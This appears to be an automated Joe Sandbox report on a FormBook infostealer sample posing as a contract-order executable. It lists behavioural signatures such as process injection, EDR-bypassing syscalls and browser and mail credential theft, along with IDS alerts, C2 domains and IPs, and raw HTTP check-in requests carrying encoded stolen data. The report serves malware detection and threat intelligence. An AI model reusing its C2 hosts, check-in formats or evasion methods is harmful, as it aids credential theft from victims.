Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
New Order - RCII900718_Contract Drafting.exe

Overview

General Information

Sample name:New Order - RCII900718_Contract Drafting.exe
Analysis ID:1559084
MD5:ab7ce84e9de63dbe7082872755e8a87c
SHA1:cfe36e1ca460e9033dfcda4bbd2a1373feeb22b9
SHA256:bfb840367f7275924d9f1516fc214fbdd64118a5420bdd17a85d2e57ed9cd5b7
Tags:exeFormbookuser-threatcat_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • New Order - RCII900718_Contract Drafting.exe (PID: 1892 cmdline: "C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe" MD5: AB7CE84E9DE63DBE7082872755E8A87C)
    • RegAsm.exe (PID: 2308 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • ZrTbKDhAWYKJu.exe (PID: 4208 cmdline: "C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • sc.exe (PID: 1608 cmdline: "C:\Windows\SysWOW64\sc.exe" MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
          • ZrTbKDhAWYKJu.exe (PID: 1068 cmdline: "C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 984 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000006.00000002.2978480170.0000000003630000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000001.00000002.2240548681.00000000025C0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000001.00000002.2239985044.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000006.00000002.2978393331.00000000035C0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries
            SourceRuleDescriptionAuthorStrings
            1.2.RegAsm.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              1.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-20T07:16:10.362783+010020507451Malware Command and Control Activity Detected192.168.2.449811108.179.253.19780TCP
                2024-11-20T07:16:33.637770+010020507451Malware Command and Control Activity Detected192.168.2.449963108.181.189.780TCP
                2024-11-20T07:16:47.040281+010020507451Malware Command and Control Activity Detected192.168.2.45001013.248.169.4880TCP
                2024-11-20T07:17:10.487544+010020507451Malware Command and Control Activity Detected192.168.2.45001423.225.159.4280TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-20T07:16:10.362783+010028554651A Network Trojan was detected192.168.2.449811108.179.253.19780TCP
                2024-11-20T07:16:33.637770+010028554651A Network Trojan was detected192.168.2.449963108.181.189.780TCP
                2024-11-20T07:16:47.040281+010028554651A Network Trojan was detected192.168.2.45001013.248.169.4880TCP
                2024-11-20T07:17:10.487544+010028554651A Network Trojan was detected192.168.2.45001423.225.159.4280TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-20T07:16:25.981190+010028554641A Network Trojan was detected192.168.2.449910108.181.189.780TCP
                2024-11-20T07:16:28.502632+010028554641A Network Trojan was detected192.168.2.449928108.181.189.780TCP
                2024-11-20T07:16:31.393915+010028554641A Network Trojan was detected192.168.2.449944108.181.189.780TCP
                2024-11-20T07:16:39.358769+010028554641A Network Trojan was detected192.168.2.44999913.248.169.4880TCP
                2024-11-20T07:16:41.914657+010028554641A Network Trojan was detected192.168.2.45000813.248.169.4880TCP
                2024-11-20T07:16:44.486980+010028554641A Network Trojan was detected192.168.2.45000913.248.169.4880TCP
                2024-11-20T07:17:02.315974+010028554641A Network Trojan was detected192.168.2.45001123.225.159.4280TCP
                2024-11-20T07:17:04.831630+010028554641A Network Trojan was detected192.168.2.45001223.225.159.4280TCP
                2024-11-20T07:17:07.409732+010028554641A Network Trojan was detected192.168.2.45001323.225.159.4280TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: New Order - RCII900718_Contract Drafting.exeAvira: detected
                Source: New Order - RCII900718_Contract Drafting.exeReversingLabs: Detection: 31%
                Source: New Order - RCII900718_Contract Drafting.exeVirustotal: Detection: 33%Perma Link
                Source: Yara matchFile source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.2978480170.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2240548681.00000000025C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2239985044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2978393331.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2241932701.0000000002B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: New Order - RCII900718_Contract Drafting.exeJoe Sandbox ML: detected
                Source: New Order - RCII900718_Contract Drafting.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: New Order - RCII900718_Contract Drafting.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: RIDE.pdb source: New Order - RCII900718_Contract Drafting.exe, 00000000.00000002.1721869696.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, New Order - RCII900718_Contract Drafting.exe, 00000000.00000002.1721792816.0000000000FE0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ZrTbKDhAWYKJu.exe, 00000005.00000000.2167494215.000000000054E000.00000002.00000001.01000000.00000007.sdmp, ZrTbKDhAWYKJu.exe, 00000007.00000002.2977812837.000000000054E000.00000002.00000001.01000000.00000007.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000006.00000003.2242299628.00000000037EA000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000003.2240309306.0000000003638000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: RegAsm.pdb source: sc.exe, 00000006.00000002.2977665984.000000000325E000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000002.2979542481.0000000003FBC000.00000004.10000000.00040000.00000000.sdmp, ZrTbKDhAWYKJu.exe, 00000007.00000002.2978983691.000000000257C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2532705070.0000000029ECC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: sc.pdbUGP source: ZrTbKDhAWYKJu.exe, 00000005.00000002.2978143078.0000000000997000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, sc.exe, sc.exe, 00000006.00000003.2242299628.00000000037EA000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000003.2240309306.0000000003638000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: RegAsm.pdb4 source: sc.exe, 00000006.00000002.2977665984.000000000325E000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000002.2979542481.0000000003FBC000.00000004.10000000.00040000.00000000.sdmp, ZrTbKDhAWYKJu.exe, 00000007.00000002.2978983691.000000000257C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2532705070.0000000029ECC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: sc.pdb source: ZrTbKDhAWYKJu.exe, 00000005.00000002.2978143078.0000000000997000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_02F2CA10 FindFirstFileW,FindNextFileW,FindClose,6_2_02F2CA10
                Source: C:\Windows\SysWOW64\sc.exeCode function: 4x nop then xor eax, eax6_2_02F19F90
                Source: C:\Windows\SysWOW64\sc.exeCode function: 4x nop then pop edi6_2_02F1E5AA
                Source: C:\Windows\SysWOW64\sc.exeCode function: 4x nop then mov ebx, 00000004h6_2_037204EE

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49928 -> 108.181.189.7:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50008 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49963 -> 108.181.189.7:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49963 -> 108.181.189.7:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50014 -> 23.225.159.42:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50014 -> 23.225.159.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49944 -> 108.181.189.7:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49999 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50009 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50010 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50010 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50011 -> 23.225.159.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50012 -> 23.225.159.42:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49811 -> 108.179.253.197:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49910 -> 108.181.189.7:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49811 -> 108.179.253.197:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50013 -> 23.225.159.42:80
                Source: DNS query: www.avalanchefi.xyz
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: CNSERVERSUS CNSERVERSUS
                Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                Source: Joe Sandbox ViewASN Name: ASN852CA ASN852CA
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /7n6c/?Vblddl=ePeKNPyUeLpNn1ut9QR5+vkaHUGSQvJrwPLb6fKcgQCso5jGZqjP6M9GYYTFao+4npn6icqsLwsi7nEjf66UvTUwrIE2dD1LfojjSGoioIp2xNG+LZcOM+Y=&At=4ZW0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.bloodbalancecaps.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /xu9o/?Vblddl=Y1SnkQLh9oyCIrW0o0O4vqPemXX8Spt1zoY93P6OWbCvdS06v54NadN0bxhIZaxlyI96f1lIInN9xaPSBVcrMr8DLl9ZyJ18b2nxQ81rZE0uLnMg7aaVIRg=&At=4ZW0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.jalan2.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /ctta/?At=4ZW0&Vblddl=73htI/07lnbi6jhjvkNHrlWSa6BSjsKivRRSV4arkt57XDlKC2xJvna+Jje1nWd5k0Z3PS0VVZTw4ek7NFPoag2/xWEWhdCP8yoM02bo7Rk5ZALP8w8OFi4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.avalanchefi.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /dfeq/?Vblddl=gAXULa6m81FP6NaNWEaqYxdrDcJADutaGDMyuCCNna1Q7N6mqkEUlVDne0yRrfV+N8trXlbxkU4RIowztTRv+FQMMrCoDDJ1FGnXoByL22JcZjp7VwlUZtI=&At=4ZW0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.laohub10.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficDNS traffic detected: DNS query: www.bloodbalancecaps.shop
                Source: global trafficDNS traffic detected: DNS query: www.jalan2.online
                Source: global trafficDNS traffic detected: DNS query: www.avalanchefi.xyz
                Source: global trafficDNS traffic detected: DNS query: www.02760.wang
                Source: global trafficDNS traffic detected: DNS query: www.laohub10.net
                Source: unknownHTTP traffic detected: POST /xu9o/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.jalan2.onlineOrigin: http://www.jalan2.onlineReferer: http://www.jalan2.online/xu9o/Content-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 203Cache-Control: max-age=0User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30Data Raw: 56 62 6c 64 64 6c 3d 56 33 36 48 6e 6d 69 69 37 39 65 36 5a 61 44 49 36 54 53 62 6c 71 66 57 73 56 72 4b 54 35 74 77 69 59 35 5a 30 39 7a 72 57 36 2b 51 66 54 78 4e 72 72 51 75 58 39 56 63 64 45 51 33 4c 4a 77 6e 38 36 78 35 55 56 74 4c 63 55 45 42 68 61 4c 6a 47 6e 77 6c 4d 72 30 69 4c 55 74 43 75 4a 4a 66 56 6c 57 33 4e 74 46 67 58 31 64 74 56 47 6f 30 2b 71 61 48 56 42 4b 6b 6a 38 52 6f 63 52 31 69 53 52 55 62 68 4b 69 4f 70 39 35 56 46 70 38 7a 69 49 6b 72 6d 49 7a 34 36 52 52 30 53 6f 48 6b 56 4c 52 52 4b 56 41 71 30 48 58 4e 74 34 4a 72 70 75 39 61 73 63 74 75 50 4e 48 68 7a 77 2f 67 55 67 3d 3d Data Ascii: Vblddl=V36Hnmii79e6ZaDI6TSblqfWsVrKT5twiY5Z09zrW6+QfTxNrrQuX9VcdEQ3LJwn86x5UVtLcUEBhaLjGnwlMr0iLUtCuJJfVlW3NtFgX1dtVGo0+qaHVBKkj8RocR1iSRUbhKiOp95VFp8ziIkrmIz46RR0SoHkVLRRKVAq0HXNt4Jrpu9asctuPNHhzw/gUg==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmlcache-control: private, no-cache, max-age=0pragma: no-cachedate: Wed, 20 Nov 2024 06:16:25 GMTserver: LiteSpeedcontent-encoding: gzipvary: Accept-Encodingtransfer-encoding: chunkedconnection: closeData Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a Data Ascii: a
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmlcache-control: private, no-cache, max-age=0pragma: no-cachedate: Wed, 20 Nov 2024 06:16:28 GMTserver: LiteSpeedcontent-encoding: gzipvary: Accept-Encodingtransfer-encoding: chunkedconnection: closeData Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a 32 62 64 0d 0a 65 54 6b 6b db 30 14 fd 5e d8 7f b8 4d 19 b4 10 27 76 ea b0 61 3b 66 63 0f 36 18 5b a1 85 b1 8f b2 75 1d 89 ca 92 27 29 af 95 fe f7 5d d9 49 9a b6 16 d8 92 7c 75 74 ee 39 57 2a ce 3f ff fa 74 f7 e7 e6 0b 08 df aa f2 ac 08 1f 70 7e a7 70 31 12 28 97 c2 67 49 1c bf 1d 85 5f c8 38 7d 5a f4 0c 34 6b 29 60 2d 71 d3 19 eb 47 50 1b ed 51 fb c5 68 23 b9 17 0b 8e 6b 59 63 d4 0f c6 20 b5 f4 92 a9 c8 d5 8c 60 93 31 38 61 a5 be 8f bc 89 1a e9 17 da 04 74 2f bd c2 12 d2 38 85 9f c6 c3 57 b3 d2 fc cd 59 31 1d e6 8b 9e 52 f9 a1 45 2e 19 5c 76 16 1b b4 2e aa 8d 32 96 70 05 b6 98 71 66 ef af 1e 2a c3 77 0f 15 ab ef 97 36 40 0c 21 d9 45 1c c7 e7 b2 0d 64 99 f6 8f 8f c5 74 00 2c a6 fb ac c2 b2 43 de c3 12 b8 48 d3 34 87 96 d9 a5 d4 59 9c 37 94 62 06 da d8 96 29 48 d2 6e 3b 9d c5 dd 16 3e 5a 4a 6d 0c df 50 ad d1 cb 9a 51 76 4c bb c8 a1 95 4d 0e 27 12 e6 f0 8a 15 5c 34 4d 93 87 ec b9 5c bf 50 9d ad bc a1 dd a5 8e 9e 61 8c 4a 08 cf e9 02 8f 5b 1f 31 25 97 3a 83 9a 4c 40 9b 43 af 7c f6 3e 26 86 87 14 22 85 0d 25 10 a5 c3 64 67 1c b9 62 74 c6 2a 67 d4 ca 63 0e de 74 19 5c 87 5d fa d0 39 f5 88 1b ec 9f 42 24 87 1d 8f 9a 40 10 25 72 f2 1f 66 c9 bc 87 55 52 e3 91 f1 30 d5 c7 6c 86 a9 ca 28 4e a0 e4 32 29 9f 84 a2 9a 3d 07 8d 02 89 20 6c fe 04 4d 9c 68 3c 2a 9f d5 85 98 d1 ea ae bc 13 08 16 9d 59 d9 3a 74 fe ae d0 79 e4 54 8f 2b c5 c9 2c 0f 15 12 01 5a 03 46 83 17 d2 01 39 b3 46 7b 5e 4c 3b 02 98 92 8e e5 fe 7d 22 e9 be 68 9a 38 b4 67 59 ce 88 c9 3e fd de a1 8e 71 2e f5 32 0b a5 10 68 c2 a1 93 1f 05 b6 a8 98 97 6b cc 6b 85 cc 92 04 5e e4 4f 9e 1e f1 fa cc a3 24 4e 68 e6 75 fd a6 ef 42 cb 2b 63 39 da 3e 14 28 10 c8 3a c9 c1 2e 2b 76 19 8f fb 36 49 e6 57 14 b6 8d 9c 60 dc 6c 32 88 fb c0 78 08 9a cd e7 63 78 7a c5 93 eb 2b 3a 9e 0e 7d 5f 85 95 2d 6f 68 57 ae 76 54 1e 1b b4 24 64 b5 83 1f d2 e3 6d 87 34 f8 8d 15 dc f6 f2 91 f2 37 94 8d c3 a0 2f e3 6b e9 e8 b7 17 cc 9f 44 df 61 2d 34 b1 5f 4a 74 f0 5d d7 13 20 f5 83 25 0c 36 04 24 8c f3 a4 1c 59 d5 76 4c ef 80 69 3e 06 46 fe ac 6a ba 33 04 0b b1 fd bd 62 8d 02 43 7b 1e 2e 99 97 7e d2 86 93 e0 e6 c1 cc 70 94 c3 c1 ee 2f b4 ff 0d 2b 0f 61 e1 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a2bdeTkk0^M'va;fc6[u')]I|ut9W*?tp~p1(gI_8}Z4k)`-qGPQh#kYc `18at/8WY1RE.\v.2pqf*w6@!Edt,CH4Y7b)Hn;>ZJmPQvLM'\4M\PaJ[1%:L@C|>&"%dgbt*gct\]9B$@%rfUR0l(N2)= lMh<*Y:tyT+,ZF9F{^L;}"h8gY>q.2hkk
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmlcache-control: private, no-cache, max-age=0pragma: no-cachecontent-length: 1249date: Wed, 20 Nov 2024 06:16:33 GMTserver: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75
